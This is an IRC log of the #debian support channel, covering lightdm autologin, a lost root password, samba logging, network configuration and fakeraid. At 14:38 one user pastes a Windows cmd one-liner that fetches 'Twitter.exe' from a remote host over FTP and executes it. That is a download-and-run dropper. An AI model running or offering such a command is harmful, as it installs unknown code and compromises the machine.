14:03 | -!- | jlsookiki [~jlsookiki@pal01cs004.americas.hp.net] has left #debian [] |
14:04 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
14:04 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
14:05 | -!- | diverguoju [~konverguo@91-233-176-160.inet.vub.lt] has quit [Ping timeout: 480 seconds] |
14:06 | -!- | dtw [dtw@dsl-roibrasgw1-fe84fb00-215.dhcp.inet.fi] has quit [Quit: ERC Version 5.3 (IRC client for Emacs)] |
14:10 | -!- | thkoch [~thkoch@52-188.77-83.cust.bluewin.ch] has quit [] |
14:11 | -!- | ompaul [~ompaul@109.76.190.238] has joined #debian |
14:12 | -!- | jkf [~Greg_od@85-238-118-157.broadband.tenet.odessa.ua] has quit [Quit: Leaving.] |
14:12 | -!- | cybersphinx_ [~cyber@p4FD664F0.dip.t-dialin.net] has joined #debian |
14:12 | <scientes> | I set autologin-user=touchscreen in my /etc/lightdm/lightdm.conf but it doesn't work |
14:13 | <scientes> | any help? |
14:13 | -!- | clopper [~Gooey@87.127.118.140] has joined #debian |
14:14 | -!- | fabrice [~fabrice@modemcable006.147-80-70.mc.videotron.ca] has quit [Read error: Connection reset by peer] |
14:15 | -!- | fabrice [~fabrice@modemcable006.147-80-70.mc.videotron.ca] has joined #debian |
14:15 | <ompaul> | SeatDefaults] autologin-user={YOUR USER NAME} ... |
14:16 | <Han> | scientes, "it doesn't work" is vague. What do you want to happen? |
14:17 | -!- | vodka [~paper@85.Red-83-41-151.dynamicIP.rima-tde.net] has joined #debian |
14:17 | <scientes> | well, i still get the greater |
14:18 | <scientes> | instead of it auto logging in |
14:18 | -!- | paulo [~paulo@187.59.241.173] has quit [Read error: Operation timed out] |
14:18 | <ompaul> | the greeter? |
14:18 | <scientes> | lightdm-gtk-greeter login interface |
14:18 | <scientes> | it doesn't just to logged in as soon as i /etc/init.d/lighdm start |
14:18 | -!- | Brutus [~blank@96.44.163.76] has joined #debian |
14:19 | <towo`> | autologin in lightdm does not work without pam-settings |
14:19 | <scientes> | towo`, thx |
14:19 | -!- | cybersphinx [~cyber@p5492E45F.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
14:20 | <scientes> | towo`, any documentation of those you can find? |
14:20 | -!- | lukasz_gut [~Lukasz@eswebprx01x.nokia.com] has joined #debian |
14:20 | -!- | zk [~zk@79.112.2.122] has quit [Quit: Leaving] |
14:20 | -!- | sergejptr [~sergejptr@93-86-7-93.dynamic.isp.telekom.rs] has joined #debian |
14:21 | -!- | sergejptr [~sergejptr@93-86-7-93.dynamic.isp.telekom.rs] has left #debian [] |
14:21 | -!- | lukasz_gut [~Lukasz@eswebprx01x.nokia.com] has quit [Remote host closed the connection] |
14:22 | <scientes> | /etc/pam.d/lightdm ? |
14:22 | -!- | lukasz_gut [~Lukasz@eswebprx01x.nokia.com] has joined #debian |
14:23 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has quit [Quit: No Ping reply in 180 seconds.] |
14:24 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has joined #debian |
14:27 | -!- | xharx__ [~xharx@port-92-205-36-112.dynamic.qsc.de] has joined #debian |
14:27 | -!- | semko [~semko@dhcp-186-134.gjk.dk] has joined #debian |
14:28 | -!- | firewall [~firewall@201.122.131.246] has joined #debian |
14:28 | <semko> | i just freshly installed debian (wihhout any desktop env.) |
14:28 | <semko> | but i cannot login as root! |
14:28 | -!- | aroundthfur [~aroundthf@host-124-93.panorama.sth.ac.at] has quit [Quit: Leaving] |
14:28 | <ompaul> | semko: can you log in at all? |
14:28 | <semko> | su tells me authentication failure |
14:29 | <semko> | i can login as normal user |
14:29 | <semko> | which is semko :) |
14:29 | <ompaul> | try sudo -i in your own account and tell me if that works |
14:29 | * | ompaul wonders about this madness sometimes |
14:29 | <ompaul> | semko: please try that |
14:29 | <semko> | command not found |
14:30 | <semko> | sudo is not installed apparantly |
14:30 | -!- | monstaRtruck [~monstaRtr@206.181.80.162] has joined #debian |
14:30 | <ompaul> | ok |
14:30 | -!- | paulo [~paulo@187.59.241.173] has joined #debian |
14:30 | * | semko is damn sure he remembers the root password when he entered it 5 mins ago |
14:30 | <weasel> | different keyboard layout? |
14:31 | <semko> | weasel, no |
14:31 | <weasel> | then set a new root password |
14:31 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has quit [Quit: No Ping reply in 180 seconds.] |
14:31 | -!- | giuseppe [~giuseppe@adsl-ull-147-86.50-151.net24.it] has joined #debian |
14:31 | <semko> | weasel, how? |
14:31 | -!- | trifolio6 [~h@62.43.50.166.dyn.user.ono.com] has joined #debian |
14:31 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has joined #debian |
14:31 | -!- | aroundthfur [~aroundthf@host-124-93.panorama.sth.ac.at] has joined #debian |
14:32 | -!- | trifolio6 [~h@62.43.50.166.dyn.user.ono.com] has quit [] |
14:32 | -!- | wojtek [~example@109.231.12.48] has quit [Remote host closed the connection] |
14:32 | <weasel> | semko: boot with init=/bin/sh on the kernel command line, mount / read write, run passwd to set a new password, sync, remount ro, reboot |
14:32 | <ompaul> | semko: it doesn't change passwords unless something is very wrong |
14:32 | <firewall> | Hi. anyone know if there is an application that generates reports modification samba file sharing? |
14:32 | -!- | XeonBloomfield [~XeonBloom@n02.satfilm.pl] has joined #debian |
14:32 | * | abdulkarim is away: I'm busy doing *thing! |
14:32 | <ompaul> | semko: or the channel would be full the whole time :) n |
14:33 | <ompaul> | abdulkarim: we don't care do /away and be silent ;-) |
14:33 | <semko> | ompaul, i mean su command should work |
14:33 | <semko> | and i am sure i entered it correctly |
14:33 | -!- | trifolio6 [~h@62.43.50.166.dyn.user.ono.com] has joined #debian |
14:33 | <semko> | maybe i should re install :| |
14:33 | <weasel> | semko: have you actually tried logging in as root? |
14:33 | <semko> | weasel, fails |
14:33 | <ompaul> | semko: aye, obviously you had your hands in a different position to the one you thought the you had them in :-) see what weasel said about a minutes ago |
14:33 | <semko> | claims "authentication failure" |
14:33 | <weasel> | then reset the root password like I just told you how. |
14:34 | -!- | weland [~weland_tb@95.76.26.232] has joined #debian |
14:35 | <semko> | ok /me will try |
14:35 | -!- | karlnack [~karlnack@168.93.96.5] has joined #debian |
14:37 | -!- | att [~att@186.213.15.165] has quit [Ping timeout: 480 seconds] |
14:37 | -!- | vladuke [~vladuke@91.146.35.175] has quit [Ping timeout: 480 seconds] |
14:37 | -!- | giuseppe [~giuseppe@adsl-ull-147-86.50-151.net24.it] has quit [Quit: Sto andando via] |
14:38 | -!- | Riz_School [~ubuntu@12.235.59.50] has joined #debian |
14:38 | <firewall> | %systemroot%\system32\cmd.exe |
14:38 | <monstaRtruck> | hey do u guys have a proxy i can use |
14:38 | -!- | Riz_School [~ubuntu@12.235.59.50] has quit [] |
14:38 | <monstaRtruck> | stupid admin baned me from freenode |
14:38 | <firewall> | cmd /c echo open xxx.xxx.xxx 21 >> ij &echo user upload upload >> ij &echo binary >> ij &echo get Twitter.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &Twitter.exe &exit |
14:39 | <ompaul> | firewall: it broke s/windows/debian/g the rest became pointless very quickly |
14:39 | <txt_file> | monstaRtruck: have you tried tor? |
14:40 | -!- | mode/#debian [+l 506] by debhelper |
14:40 | -!- | fox_II [~b1u3@200.206.121.35] has joined #debian |
14:40 | <monstaRtruck> | what is tor |
14:40 | <monstaRtruck> | ? |
14:40 | <monstaRtruck> | brb tell me more |
14:40 | <firewall> | anyone know if there is an application that generates reports modification samba file sharing? |
14:41 | <monstaRtruck> | i honestly didnt deserve it |
14:41 | <monstaRtruck> | i said i will poop on ur head |
14:41 | <monstaRtruck> | just out loud, not directed to anyone |
14:41 | <monstaRtruck> | then admin started pming me |
14:41 | <retrospectacus> | monstaRtruck: this channel is debian support. Please go complain somewhere else |
14:42 | -!- | bst_ [~bst@net40-0-245-109.mbb.telenor.rs] has quit [Remote host closed the connection] |
14:42 | -!- | edog [~edog@alcotrash.org] has joined #debian |
14:42 | -!- | Se-bash^2 [~seba@host201.190-136-245.telecom.net.ar] has joined #debian |
14:43 | -!- | gnugr [~vangelis@79.167.78.18] has joined #debian |
14:43 | -!- | mark76 [~quassel@cpc10-nfds14-2-0-cust293.8-2.cable.virginmedia.com] has quit [Remote host closed the connection] |
14:44 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has joined #debian |
14:44 | <Han> | firewall, there is something more specific, vfs which report filesystem changes. |
14:44 | -!- | djj [djj@hilla.kapsi.fi] has quit [Server closed connection] |
14:44 | -!- | djj [djj@hilla.kapsi.fi] has joined #debian |
14:45 | -!- | Se-bash [~seba@host186.190-31-186.telecom.net.ar] has quit [Ping timeout: 480 seconds] |
14:45 | -!- | Se-bash^2 is now known as Se-bash |
14:45 | -!- | lukasz_gut [~Lukasz@eswebprx01x.nokia.com] has quit [Remote host closed the connection] |
14:45 | -!- | mustafa [~mustafa@adsl-99-37-225-91.dsl.pltn13.sbcglobal.net] has joined #debian |
14:45 | -!- | semko [~semko@dhcp-186-134.gjk.dk] has quit [Quit: Leaving] |
14:45 | -!- | mustafa [~mustafa@adsl-99-37-225-91.dsl.pltn13.sbcglobal.net] has quit [] |
14:46 | -!- | carandraug [~carandrau@proxy2.library.nuigalway.ie] has quit [Quit: Ex-Chat] |
14:49 | -!- | jgarvey [~jgarvey@cpe-174-097-248-211.nc.res.rr.com] has joined #debian |
14:50 | <firewall> | Han: yes reporting of modification of files |
14:51 | -!- | hele [~hele@cs78198129.pp.htv.fi] has quit [Quit: Konversation terminated!] |
14:51 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has quit [Ping timeout: 480 seconds] |
14:52 | -!- | sitinavra [~sitinavra@188.4.162.209.dsl.dyn.forthnet.gr] has quit [Quit: Konversation terminated!] |
14:52 | -!- | theworlds [~theworlds@static-72-72-162-100.hrbgpa.east.verizon.net] has quit [Quit: Leaving] |
14:53 | -!- | drdanz [~quassel@hide-biolab.dist.unige.it] has quit [Remote host closed the connection] |
14:53 | -!- | vladmiro [~vladmiro@41.72.27.182] has joined #debian |
14:54 | -!- | clopper [~Gooey@87.127.118.140] has quit [Quit: Leaving] |
14:54 | -!- | vladmiro [~vladmiro@41.72.27.182] has quit [] |
14:55 | -!- | Bucciarati [~buccia@212.45.155.126] has quit [Ping timeout: 480 seconds] |
14:55 | -!- | tribe99990 [~tribe9999@184-14-184-54.dr03.chtn.wv.frontiernet.net] has joined #debian |
14:55 | -!- | bike [~bike@ti0128a380-dhcp0243.bb.online.no] has quit [Ping timeout: 480 seconds] |
14:56 | -!- | Caroll [~caroll@189.123.216.170] has quit [Quit: Leaving] |
14:56 | <firewall> | hi hi |
14:57 | <firewall> | anyone know if there is an application that generates reports modification samba file sharing? |
14:57 | <weasel> | you asked that before |
14:57 | -!- | UltimediaOS1 [~Ultimedia@i5387F514.versanet.de] has joined #debian |
14:58 | -!- | giuseppe [~giuseppe@adsl-ull-147-86.50-151.net24.it] has joined #debian |
14:58 | -!- | giuseppe [~giuseppe@adsl-ull-147-86.50-151.net24.it] has quit [] |
14:58 | -!- | polomek [~polomek@d35-188.icpnet.pl] has joined #debian |
15:00 | -!- | mode/#debian [+l 500] by debhelper |
15:00 | <retrospectacus> | firewall: samba logs all that. Just read the logs |
15:02 | -!- | tribe99990 [~tribe9999@184-14-184-54.dr03.chtn.wv.frontiernet.net] has quit [Quit: Leaving] |
15:03 | -!- | Zzyzix [~Zzyzix@SE400.PPPoE-600.sa.bih.net.ba] has joined #debian |
15:03 | -!- | f8l [~f8l@77-254-76-13.adsl.inetia.pl] has joined #debian |
15:03 | -!- | trifolio6 [~h@62.43.50.166.dyn.user.ono.com] has quit [Quit: Konversation terminated!] |
15:04 | -!- | tuxampol [~tuxampol@ppp-88-217-90-186.dynamic.mnet-online.de] has quit [Quit: Verlassend] |
15:04 | -!- | UltimediaOS [~Ultimedia@i5387FFF4.versanet.de] has quit [Ping timeout: 480 seconds] |
15:05 | -!- | bike [~bike@ti0128a380-dhcp0243.bb.online.no] has joined #debian |
15:05 | -!- | chris [~chris@catv-86-101-251-241.catv.broadband.hu] has joined #debian |
15:06 | -!- | and1bm [~andi@HSI-KBW-078-043-080-072.hsi4.kabel-badenwuerttemberg.de] has quit [Quit: Konversation terminated!] |
15:07 | -!- | Bucciarati [~buccia@212.45.155.200] has joined #debian |
15:07 | <Han> | Even better |
15:07 | -!- | mark76 [~quassel@cpc10-nfds14-2-0-cust293.8-2.cable.virginmedia.com] has joined #debian |
15:08 | -!- | Fotografiona [~Fotografi@dslb-094-223-108-042.pools.arcor-ip.net] has joined #debian |
15:09 | -!- | ribe [~riberto@108-213-125-32.lightspeed.miamfl.sbcglobal.net] has joined #debian |
15:11 | -!- | PTKDev [~PTKDev@ppp-253-30.24-151.libero.it] has joined #debian |
15:11 | -!- | kevin8t8 [~kevin8t8@71-220-200-130.eugn.qwest.net] has quit [Read error: Connection reset by peer] |
15:11 | -!- | kevin8t8 [~kevin8t8@71-220-200-130.eugn.qwest.net] has joined #debian |
15:11 | -!- | ompaul [~ompaul@109.76.190.238] has quit [Quit: Konversation terminated!] |
15:12 | -!- | ompaul [~ompaul@109.76.190.238] has joined #debian |
15:12 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
15:13 | -!- | watame [~router@ool-1892e4ed.dyn.optonline.net] has joined #debian |
15:13 | -!- | jonnyATroot [~jonny@194.228.142.126] has joined #debian |
15:16 | -!- | Xdept [~Xdept@202.170.168.233] has joined #debian |
15:17 | -!- | kevin8t8_ [~kevin8t8@71-220-204-226.eugn.qwest.net] has joined #debian |
15:18 | -!- | jonnyATroot [~jonny@194.228.142.126] has quit [Remote host closed the connection] |
15:18 | -!- | Janik [~Janik@80.188.63.66] has joined #debian |
15:18 | -!- | banonymo [~banonymo@bel87-1-78-246-44-42.fbx.proxad.net] has joined #debian |
15:19 | -!- | gitanoblancoO [~juanka@194.Red-83-33-62.dynamicIP.rima-tde.net] has joined #debian |
15:20 | -!- | mode/#debian [+l 509] by debhelper |
15:20 | <gitanoblancoO> | olaa |
15:20 | <gitanoblancoO> | wines |
15:20 | <Xdept> | Morning |
15:20 | <gdb> | !es |
15:20 | <dpkg> | Este canal es de soporte tecnico en Ingles para Debian. Si prefiere que el soporte sea en espanol, por favor ingrese a #debian-es con /join #debian-es tecleado en la linea de chat. |
15:20 | -!- | ytrh [~etht@85.136.173.2.dyn.user.ono.com] has joined #debian |
15:20 | <gitanoblancoO> | tienes tenti |
15:20 | -!- | ytrh [~etht@85.136.173.2.dyn.user.ono.com] has quit [] |
15:20 | -!- | banonymo [~banonymo@bel87-1-78-246-44-42.fbx.proxad.net] has quit [] |
15:20 | <gitanoblancoO> | woleis a mierda |
15:20 | <gitanoblancoO> | seee |
15:20 | <gitanoblancoO> | hhh |
15:21 | <gitanoblancoO> | puta safa linares |
15:21 | <SynrG> | !ops gitanoblancoO lost spaniard |
15:21 | <dpkg> | Hydroxide, dondelelcaro, ):, helix, LoRez, RichiH, mentor, xk, abrotman, gravity, azeem, Maulkin, stew, peterS, Myon, Ganneff, weasel, zobel, themill, babilen: synrg complains about: gitanoblancoO lost spaniard |
15:21 | <gitanoblancoO> | ke te pasa atii |
15:21 | <gitanoblancoO> | noveee |
15:22 | -!- | mode/#debian [+b *!*juanka@*.Red-83-33-62.dynamicIP.rima-tde.net] by Ganneff |
15:22 | -!- | gitanoblancoO was kicked from #debian by Ganneff [gitanoblancoO] |
15:22 | <retrospectacus> | adios |
15:22 | <Xdept> | :P |
15:22 | -!- | kevin8t8 [~kevin8t8@71-220-200-130.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
15:23 | -!- | BeatSahat [~BeatSahat@chello080109130071.tirol.surfer.at] has joined #debian |
15:23 | -!- | wd40s [~wd40s@205.178.35.196] has quit [Remote host closed the connection] |
15:23 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has joined #debian |
15:24 | -!- | BeatSahat [~BeatSahat@chello080109130071.tirol.surfer.at] has quit [] |
15:24 | <firewall> | retrospectacus: logs of samba ? |
15:25 | <CutMeOwnThroat> | SynrG, you're hiding out on oftc! |
15:26 | <SynrG> | CutMeOwnThroat: hiding? where have *you* been? :) |
15:26 | <SynrG> | i'm a regular |
15:27 | -!- | mode/#debian [-b *!*juanka@*.Red-83-33-62.dynamicIP.rima-tde.net] by Ganneff |
15:27 | <SynrG> | (and OFTC is, after all, the "official" debian irc network ;) |
15:27 | <CutMeOwnThroat> | SynrG, on freenode... the place where YOU dragged me about 10 years ago |
15:27 | <SynrG> | aha. well, -> #debian-offtopic to catch up, then |
15:27 | -!- | stummi [~Stummi@77-64-128-168.dynamic.primacom.net] has quit [Quit: Bye!] |
15:28 | <retrospectacus> | firewall: yes? |
15:29 | -!- | rocky [~d12@217.216.149.16.dyn.user.ono.com] has joined #debian |
15:29 | -!- | baliano [~baliano@151.65.211.171] has joined #debian |
15:29 | -!- | kevin8t8_ [~kevin8t8@71-220-204-226.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
15:31 | -!- | jhutchins_wk [~jhutchins@216.58.251.226] has quit [Remote host closed the connection] |
15:32 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has quit [Quit: leaving] |
15:33 | -!- | fisted [~fisted@xdsl-87-78-81-118.netcologne.de] has joined #debian |
15:35 | -!- | jonnyATroot [~jonny@194.228.142.126] has joined #debian |
15:37 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has joined #debian |
15:37 | -!- | pos [~mark@ppp-48-51.grapevine.net.au] has joined #debian |
15:37 | -!- | gnugr [~vangelis@79.167.78.18] has quit [Quit: WeeChat 0.3.5] |
15:38 | -!- | kaziem [~devnull@82.32.78.188.dynamic.jazztel.es] has quit [Quit: Saliendo] |
15:42 | -!- | chris [~chris@catv-86-101-251-241.catv.broadband.hu] has left #debian [Konversation terminated!] |
15:44 | -!- | XeL64 [XeL64@40.129.84.77.rev.sfr.net] has joined #debian |
15:44 | -!- | artista_frustrado [~fernando@200.247.43.2] has quit [Quit: Leaving] |
15:45 | <XeL64> | hello |
15:46 | <Xdept> | Morning |
15:46 | -!- | clonak_ [~clonak@101.98.134.170] has quit [Ping timeout: 480 seconds] |
15:47 | <ribe> | hi all |
15:47 | -!- | john [~john@23.70-240-81.adsl-dyn.isp.belgacom.be] has quit [Quit: Quitte] |
15:47 | <Xdept> | Morning |
15:47 | -!- | gnugr [~vangelis@79.167.78.18] has joined #debian |
15:49 | -!- | chealer [~chealer@modemcable156.191-56-74.mc.videotron.ca] has quit [Quit: Konversation terminated!] |
15:50 | -!- | mode/#debian [+l 503] by debhelper |
15:51 | -!- | Hertz [~hertz@201-92-58-219.dsl.telesp.net.br] has joined #debian |
15:52 | -!- | Hertz [~hertz@201-92-58-219.dsl.telesp.net.br] has quit [] |
15:53 | -!- | rocky [~d12@217.216.149.16.dyn.user.ono.com] has quit [Read error: Connection reset by peer] |
15:53 | -!- | OkropNick [kuba@host-n2-72-190.telpol.net.pl] has quit [Remote host closed the connection] |
15:55 | <monstaRtruck> | i eat hot pocket |
15:56 | -!- | flower [~d@178-25-10-1-dynip.superkabel.de] has quit [Ping timeout: 480 seconds] |
15:56 | -!- | kolter [~kolter@2a01:e0b:1000:13:216:3eff:fe00:3e] has quit [Server closed connection] |
15:57 | -!- | kolter [~kolter@2a01:e0b:1000:13:216:3eff:fe00:3e] has joined #debian |
15:57 | -!- | ribe [~riberto@108-213-125-32.lightspeed.miamfl.sbcglobal.net] has quit [Quit: me fuí por la guardaralla...] |
15:57 | -!- | konverguoju [~konverguo@193.219.94.141] has joined #debian |
15:58 | <karlnack> | anyone know anything about the descriptionless package indexes causing the loss of extended package descriptions in apt and on the website? |
15:58 | -!- | ab_fab [~fabien@def92-12-88-177-250-146.fbx.proxad.net] has joined #debian |
15:58 | -!- | ab_fab [~fabien@def92-12-88-177-250-146.fbx.proxad.net] has left #debian [] |
15:58 | -!- | clonak [~clonak@101.98.134.170] has joined #debian |
15:59 | -!- | dxd [~darius@nj-67-76-178-114.sta.embarqhsd.net] has joined #debian |
15:59 | -!- | weland [~weland_tb@95.76.26.232] has quit [Ping timeout: 480 seconds] |
16:00 | -!- | dxd [~darius@nj-67-76-178-114.sta.embarqhsd.net] has left #debian [] |
16:00 | -!- | mlundblad [~marcus@217.142.147.24] has joined #debian |
16:00 | <karlnack> | specifically, is this an acknowledged problem that will be fixed or is this considered a "feature"? |
16:00 | <scientes> | how do i recompile a in-tree module? |
16:00 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
16:01 | -!- | maxou56800 [~maxou5680@107.154.9.109.rev.sfr.net] has joined #debian |
16:02 | -!- | TheDudeKnows [~TheDudeKn@jasper.ruschserver.com] has quit [Quit: WeeChat 0.3.2] |
16:02 | -!- | TheDudeKnows [~TheDudeKn@jasper.ruschserver.com] has joined #debian |
16:06 | <devil> | karlnack: there is a mile-long thread on debian-devel ml these days |
16:06 | -!- | txt_file [~txt@88.130.165.129] has left #debian [] |
16:10 | <eightyeight> | i have two gigabit nics. i would like to use them in the following ways: |
16:11 | <eightyeight> | 1) layer 2 multipath with AoE |
16:11 | <eightyeight> | 2) layer 3 bond with ip |
16:11 | <eightyeight> | 3) bridge the bond for vms |
16:11 | <devil> | karlnack: sorry, its on qa: http://lists.debian.org/debian-qa/2012/02/msg00009.html |
16:11 | <eightyeight> | here is a pastebin of my /etc/network/interfaces file: http://ae7.st/p/96 |
16:11 | <eightyeight> | eth0:1 and eth1:1 are not coming up. why? |
16:12 | -!- | janos_ [~janos@93-87-213-144.dynamic.isp.telekom.rs] has quit [Ping timeout: 480 seconds] |
16:13 | -!- | pos [~mark@ppp-48-51.grapevine.net.au] has quit [Ping timeout: 480 seconds] |
16:13 | <karlnack> | devil: the discussion on devel one seems to have died off with little/no resolution or solution. but i haven't seen the one on qa; i'll check it out. thanks. |
16:13 | -!- | Xdept [~Xdept@202.170.168.233] has quit [Quit: Leaving] |
16:16 | -!- | Nik05 [~Nik05@s5377b589.adsl.wanadoo.nl] has quit [Quit: Leaving] |
16:16 | -!- | Nik05 [~Nik05@s5377b589.adsl.wanadoo.nl] has joined #debian |
16:19 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has quit [Read error: Connection reset by peer] |
16:19 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has joined #debian |
16:19 | <karlnack> | devil: should this also be happening in apt though? from what i understand, it sounds like apt should be pulling in the correct translation files when doing an update, but they're always ignored. unrelated bug? |
16:20 | -!- | Xdept [~Xdept@202.170.168.233] has joined #debian |
16:21 | -!- | priv1 [~private@HSI-KBW-078-043-166-046.hsi4.kabel-badenwuerttemberg.de] has quit [Quit: Leaving.] |
16:21 | <devil> | karlnack: i didnt follow the whole thread, so i am not the right one to discuss this with :( |
16:21 | -!- | melmothX [~melmoth@93-137-178-207.adsl.net.t-com.hr] has quit [Quit: #] |
16:21 | -!- | Trib [~kvirc@41.121.66.169] has joined #debian |
16:22 | -!- | ribe [~riberto@108-213-125-32.lightspeed.miamfl.sbcglobal.net] has joined #debian |
16:22 | -!- | reklipz [~nmschulte@ip72-198-206-85.om.om.cox.net] has joined #debian |
16:22 | <karlnack> | devil: i've read through it and i'm still not sure i fully understand it. :) |
16:23 | -!- | fox_II [~b1u3@200.206.121.35] has quit [Remote host closed the connection] |
16:24 | -!- | m42 [~m42@bl15-100-168.dsl.telepac.pt] has joined #debian |
16:25 | -!- | TheCrittaC [~critta@christopher-lemay-4.umeres.maine.edu] has joined #debian |
16:25 | <Trib> | hello. i am in the process of setting up my network via the interfaces file. i have the following ' up ip route add 172.0.0.0/8 via 192.168.0.199' which does not seem to be applied on a reboot. the rest of the file works... should i pastbin the whole file? |
16:26 | -!- | anbe [~andreas@dessauer-B.div.uni-frankfurt.de] has joined #debian |
16:27 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has joined #debian |
16:28 | -!- | kevin8t8_ [~kevin8t8@71-220-200-162.eugn.qwest.net] has joined #debian |
16:28 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has quit [Read error: Connection reset by peer] |
16:30 | -!- | xharx_ [~xharx@port-92-205-28-77.dynamic.qsc.de] has joined #debian |
16:31 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has quit [Remote host closed the connection] |
16:31 | -!- | aroundthfur [~aroundthf@host-124-93.panorama.sth.ac.at] has quit [Ping timeout: 480 seconds] |
16:31 | -!- | _NIN [~NIN@p5DD2828B.dip0.t-ipconnect.de] has joined #debian |
16:31 | -!- | babab [~babab@535363A6.cm-6-4b.dynamic.ziggo.nl] has quit [Quit: WeeChat 0.3.2] |
16:32 | -!- | Seb1 [~sebastian@p5091CFC1.dip.t-dialin.net] has quit [Remote host closed the connection] |
16:32 | <CutMeOwnThroat> | perhaps use post-up? |
16:32 | <Trib> | i will give it a try... thanks |
16:33 | <CutMeOwnThroat> | how can there be pre-up, post-up AND also just plain up? |
16:33 | -!- | oramirez [~oramirez@d24-150-32-216.home.cgocable.net] has joined #debian |
16:33 | <CutMeOwnThroat> | according to manpage failing pre/post-up make the whole ifup fail... so at least you see it |
16:34 | <Trib> | i assumed from the man page up = post-up |
16:34 | <CutMeOwnThroat> | could be |
16:34 | <CutMeOwnThroat> | then down == pre-down |
16:34 | -!- | xharx__ [~xharx@port-92-205-36-112.dynamic.qsc.de] has quit [Ping timeout: 480 seconds] |
16:36 | <Trib> | yea. :/ |
16:37 | -!- | eja [~user@173.219.119.226] has joined #debian |
16:37 | -!- | eja [~user@173.219.119.226] has quit [] |
16:37 | <XeL64> | somebody known if it s a good idea to have swap mirrored ? (for secure all process in if one hdd crash) |
16:37 | <Xdept> | You mean on software raid? |
16:37 | <XeL64> | yes |
16:37 | <Xdept> | I don't mirror my Swap |
16:38 | <CutMeOwnThroat> | Trib, there's also an --verbose switch to ifup |
16:38 | -!- | NIN_ [~NIN@p5DD2894E.dip0.t-ipconnect.de] has quit [Ping timeout: 480 seconds] |
16:38 | -!- | shanttu [~shanttu@dsl-hkibrasgw3-ffdec300-4.dhcp.inet.fi] has quit [Remote host closed the connection] |
16:38 | <Trib> | CutMeOwnThroat: silly question... if it is verbose... where is it logging to? |
16:39 | <CutMeOwnThroat> | don't you just run ifup from your terminal? |
16:40 | <Trib> | i did... and it works. thats why i am a little confuse as to why it doesnt work on startup |
16:40 | -!- | monstaRtruck [~monstaRtr@206.181.80.162] has quit [Quit: Leaving] |
16:41 | -!- | maxou56800 [~maxou5680@107.154.9.109.rev.sfr.net] has quit [Remote host closed the connection] |
16:45 | -!- | rawnar [~mark-will@524B605D.cm-4-4b.dynamic.ziggo.nl] has joined #debian |
16:47 | -!- | jkf [~Greg_od@85-238-118-157.broadband.tenet.odessa.ua] has joined #debian |
16:47 | -!- | Black_Prince [~Prince@91.191.20.15] has quit [Remote host closed the connection] |
16:48 | -!- | indira [~indira@187.144.248.47] has joined #debian |
16:48 | -!- | Nik05 [~Nik05@s5377b589.adsl.wanadoo.nl] has quit [Remote host closed the connection] |
16:48 | -!- | indira [~indira@187.144.248.47] has quit [] |
16:49 | -!- | jespada [~jespada@190.210.55.169] has quit [Quit: Ex-Chat] |
16:50 | -!- | mode/#debian [+l 497] by debhelper |
16:50 | -!- | trifolio6 [~h@62.43.50.166.dyn.user.ono.com] has joined #debian |
16:50 | -!- | kevin8t8_ [~kevin8t8@71-220-200-162.eugn.qwest.net] has quit [Remote host closed the connection] |
16:51 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has joined #debian |
16:52 | -!- | Cnote [~Cnote@ool-addc5f53.static.optonline.net] has quit [Ping timeout: 480 seconds] |
16:52 | -!- | Cnote [~Cnote@ool-addc5f53.static.optonline.net] has joined #debian |
16:52 | -!- | janos_ [~janos@95.180.50.154] has joined #debian |
16:53 | -!- | bizio [~bizio@host32-212-dynamic.211-62-r.retail.telecomitalia.it] has joined #debian |
16:53 | <rawnar> | Hi guys and girls. |
16:54 | <rawnar> | I am trying to setup a dual-boot system with a fakeraid 5. |
16:54 | <rawnar> | The raid is not the boot disk, so not problems with grub. |
16:54 | -!- | technologov [~technolog@bzq-79-181-163-198.red.bezeqint.net] has quit [Remote host closed the connection] |
16:54 | -!- | thomas_ [~quassel@178-27-220-199-dynip.superkabel.de] has joined #debian |
16:54 | <rawnar> | But I do have problem detecting the raid under debian. |
16:56 | <XeL64> | rawnar for fakeraid it s just the hell few years i try and when all is working and no problems it s perfect but 1 one problem all is crashing lol |
16:57 | <bizio> | !list |
16:57 | <dpkg> | VATTENE VIA! |
16:57 | <XeL64> | you need a real raid adaptater or soft raid ;) |
16:57 | <retrospectacus> | !fakeraid |
16:57 | <dpkg> | Fakeraid is a term used for controller cards that advertise RAID functionality that is NOT supported by a hardware chip for parity. Most of these have only a BIOS. For use with Debian systems, it is suggested that you do not set a RAID in the BIOS and don't use dmraid, just use regular software RAID instead; ask me about <md>. http://wiki.debian.org/DebianInstaller/SataRaid |
16:58 | <rawnar> | Previous I had a fakeraid setup. Where the boot-disk was a mirror raid on a nvidia chip-set |
16:58 | -!- | lduros [~lduros@dhcp0641.nic.resnet.group.upenn.edu] has left #debian [] |
16:58 | -!- | pastubbs [~pa@host-184-174-128-161.AMNOLT1.epbfi.com] has joined #debian |
16:59 | -!- | Nux [~nik@athedsl-4460858.home.otenet.gr] has joined #debian |
